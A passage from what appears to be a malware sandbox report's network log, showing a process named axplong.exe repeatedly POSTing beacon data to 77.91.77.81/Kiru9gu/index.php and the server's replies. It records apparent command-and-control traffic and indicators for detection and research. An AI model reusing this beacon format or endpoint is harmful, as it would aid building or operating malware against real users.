                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:30.086694956 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.44975877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:30.199284077 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:30.903441906 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:30.922506094 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:31.143249989 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.44975977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:31.565912962 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:32.219683886 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:32.220541000 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:32.436491013 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.44976077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:32.560513020 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:33.276540995 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:33.277318954 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:33.508966923 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.44976177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:33.621260881 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:34.307826996 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:34.316325903 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:34.532372952 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.44976277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:34.861696959 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:35.550955057 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:35.551712036 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:35.770709991 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.44976377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:35.889019012 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:36.625209093 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:36.626189947 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:36.858711958 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.44976477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:36.982732058 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:37.669797897 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:37.671611071 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:37.924441099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.44976577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:38.043467999 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:38.776386023 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:38.777265072 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:39.019613028 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.44976677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:39.137010098 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:39.842719078 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:39.851182938 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:40.075289011 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.44976777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:40.371304989 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:41.010776997 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:41.015847921 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:41.232532978 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.44976877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:41.347975969 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:42.034478903 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:42.035789013 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:42.251048088 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.44976977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:42.371419907 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:43.066766977 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:43.067783117 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
